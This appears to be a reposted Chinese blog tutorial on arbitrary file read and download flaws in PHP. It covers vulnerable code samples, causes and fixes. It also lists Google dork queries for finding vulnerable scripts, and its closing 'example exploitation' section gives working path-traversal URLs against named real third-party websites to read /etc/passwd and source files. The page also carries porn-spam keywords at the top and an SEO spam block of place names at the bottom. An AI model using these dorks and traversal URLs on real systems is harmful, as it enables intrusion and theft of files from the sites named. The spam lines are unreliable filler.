91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

任意文件讀取與下載

發布時間:2020-09-19 01:56:46 來源:網絡 閱讀:2023 作者:nw01f 欄目:安全技術

0x00 背景介紹

    一些網站的業務需要,可能提供文件查看或下載的功能,如果對用戶查看或下載的文件不做限制,就能夠查看或下載任意的文件,可以是源文件,敏感文件等等


0x01 文件讀取

    文件讀取在PHP這種可以有很多種方式實現,在web的默認情況下,$filename變量可能用戶可控

<?php
$filename = $_GET['f'];
echo file_get_contents($filename);
?>
#當變量 $filename 沒有經過校驗,或者校驗不嚴格,用戶可以控制這個變量讀取任意文件,例如
/etc/passwd、/config.ini 等文件

0x02 實現文件下載的兩種方式

    1.直接下載:

<a ></a>

    2.增加header頭

<?php
$filename = $_GET['f'];
header('Content-Type:p_w_picpath/gif');
header('Content-Disposition:p_w_upload;filename='.$filename);
header('Content-Length:'.filesize($filename));
readfile($filename);
?>

    當$filename沒有經過校驗,或者校驗不合格,用戶可以控制這個變量下載任意文件,比如/etc/passwd,./index.php、等等就造成了任意文件下載漏洞。


0x03 成因

    都有讀取文件的函數

    讀物文件的路徑用戶可控,且沒有經過校驗,或者校驗不嚴格

    都輸出文件內容


0x04 Google Serch

inurl:"readfile.php?file="
inurl:"download.php?file="


0x05 修復方案

    過濾<.>(點)

    正則判斷用戶輸入的參數格式,匹配輸入的格式是否合格

    php.ini配置open_basedir


0x06 實例漏洞利用

(僅供測試,請勿隨意破壞)

地址:

url:http://hypnet.org.uk/shared/readfile.php?file=mental_health_audit_2014_06_15_130552.ppt

漏洞利用:

http://hypnet.org.uk/shared/readfile.php?file=../../../../../../../../../../etc/passwd

地址:

url:http://storiedifarina.it/readfile.php?file=pdf/storiedifarina.pdf

漏洞利用

http://www.wodehouse.se/upload/readfile.php?file=../index.php


向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

青神县| 营口市| 隆尧县| 承德县| 长沙县| 垦利县| 和平县| 福州市| 收藏| 江川县| 三门峡市| 铁力市| 阿巴嘎旗| 边坝县| 平陆县| 紫阳县| 湖州市| 沙河市| 济宁市| 镇沅| 故城县| 新乡县| 南充市| 高雄市| 肃北| 白沙| 张北县| 宣武区| 安康市| 江川县| 大悟县| 阿鲁科尔沁旗| 黔西| 广灵县| 林芝县| 湘潭市| 广昌县| 台北市| 灌阳县| 南安市| 玉门市|